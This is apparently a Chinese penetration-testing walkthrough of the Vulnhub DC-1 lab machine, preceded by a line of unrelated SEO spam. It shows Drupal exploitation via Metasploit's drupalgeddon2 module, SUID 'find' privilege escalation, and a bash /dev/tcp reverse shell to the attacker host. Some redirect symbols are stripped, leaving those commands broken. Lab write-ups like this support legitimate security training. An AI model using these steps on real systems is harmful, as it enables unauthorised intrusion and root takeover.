网站建设平台还有没有趋势,网站推广策略有哪些,怎么做网站的seo排名知乎,首页英文[Vulnhub靶机] DC-1靶机渗透思路及方法#xff08;个人分享#xff09;
靶机下载地址#xff1a;
https://download.vulnhub.com/dc/DC-1.zip 靶机地址#xff1a;192.168.67.28
攻击机地址#xff1a;192.168.67.3 一、信息收集
1.使用 arp-scan 命令扫描网段内存活的…[Vulnhub靶机] DC-1靶机渗透思路及方法个人分享
靶机下载地址
https://download.vulnhub.com/dc/DC-1.zip 靶机地址192.168.67.28
攻击机地址192.168.67.3 一、信息收集
1.使用 arp-scan 命令扫描网段内存活的主机以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用 nmap 工具扫描靶机开放端口、服务版本以及系统版本得到开放端口22、80、111及其服务ssh、http、rpcbind nmap -sV -O 靶机地址 -sV 探测主机服务版本 -O 识别主机操作系统 3.访问网站发现网站是Drupal网站通过插件也可以查看出该网站是Drupal网站 Drupal是一个免费开源的内容管理系统CMS它允许个人和组织轻松创建和管理各种类型的网站包括企业网站、博客、论坛、社交网络和电子商务平台等。Drupal提供了强大的功能和灵活的架构使得用户可以根据自己的需求定制网站。 4.使用dirsearch工具扫描网站目录得到多个可访问页面但对多个网页进行访问之后没有发现能够利用到的信息 dirsearch -u 靶机URL -i HTTP响应码 -u 指定目标URL -i 设置HTTP响应码的过滤条件 200响应码是最常见的成功响应码之一它表示请求成功完成服务器没有发生错误并且返回了客户端期望的结果。例如当你在浏览器中输入一个网址成功加载网页时通常会收到一个200响应码。 5.使用 searchsploit 工具对 Drupal CMS框架漏洞进行查询翻找查看有用的信息确定存在漏洞 二、漏洞利用
1.使用 msfconsole 命令进入 Metasploit 框架的命令行界面 msfconsole 是 Metasploit 框架的命令行界面它提供了一个强大的工具集用于开展渗透测试、漏洞利用和网络安全评估工作 2.使用 search 命令来搜索漏洞利用模块 3.经过测试发现 exploit/unix/webapp/drupal_drupalgeddon2 模块可以被利用使用 use 命令来选择指定的漏洞利用模块 三、反弹shell
1.查看需要配置的参数并对模块参数进行配置并再次查看配置参数进行检查要检查好确认配置成功 show options 查看配置参数 set 属性名 对参数进行配置 2.配置完成运行命令获取目标靶机的shell通过命令打开交互式界面 run或exploit 执行漏洞模块命令 run或exploit命令的区别 exploit命令用于选择并执行一个特定的漏洞利用模块。当你在Metasploit中找到了一个适合目标系统的漏洞利用模块后你可以使用exploit命令来执行该模块尝试利用目标系统上的漏洞。这个命令通常用于实际的攻击过程以获取对目标系统的访问权限或控制权。 run命令则用于执行当前已选定的模块或脚本。在Metasploit中可以通过一系列的操作来选择并配置一个模块然后使用run命令来执行该模块。这个命令通常用于执行各种辅助模块、扫描模块、信息收集模块等并非直接用于实施攻击。 3.通过 shell 命令打开交互式界面 shell -t 打开交互式界面在meterpreter界面执行 shell -t 命令的作用是创建一个交互式的本地shell。这个命令允许用户在受感染的系统上执行命令并与目标系统进行交互。 四、提权
1.使用 find 命令寻找suid程序发现 find 命令具有 suid 权限 find / -perm -4000 2/dev/null 或 find / -perm -us 2/dev/null -perm 按照权限查找文件4000、2000、1000分别表示SUIDSGIDSBIT权限如777为普通文件最高权限7000为特殊文件的最高权限 使用find命令的时候在命令后加 2/dev/null 将错误结果输出重定向到/dev/null中/dev/null是一个特殊的设备文件其实质为空设备文件其大小是0字节所有人都有读写权限而其主要作用就是将接收的一切输出给它的数据并丢弃就像垃圾桶也被称为位桶(bit bucket) 2.尝试利用 find 命令执行 whoami 命令发现成功以 root 权限执行 find which find -exec whoami \; -exec 在找到的每个文件上执行指定的命令\;是-exec选项的一部分表示命令结尾 which find 查找 find 命令的文件路径 在linux中可以用来执行命令且会优先执行 3.在攻击机使用 nc 工具开启监听 nc -lvp 监听端口号 靶机地址 -l 开启监听 -v 显示详细输出 -p 指定监听端口 4.利用 find 命令反弹shell进行提权成功反弹shell find which find -exec bash -ip /dev/tcp/192.168.67.3/7777 01 \; 利用 find 命令调用 bash 进行反弹shell bash -ip /dev/tcp/192.168.67.3/7777 01 -i 启动一个交互式的 bash shell -p 以特权模式启动 bash shell /dev/tcp 打开这个文件就类似于发出了一个socket调用建立一个socket连接读写这个文件就相当于在这个socket连接中传输数据。 具体可查看花一天时间搞懂反弹shell的命令bash -i /dev/tcp/${HOST}/${PORT} 01-CSDN博客 5.使用命令查看当前用户发现成功提权至 root 权限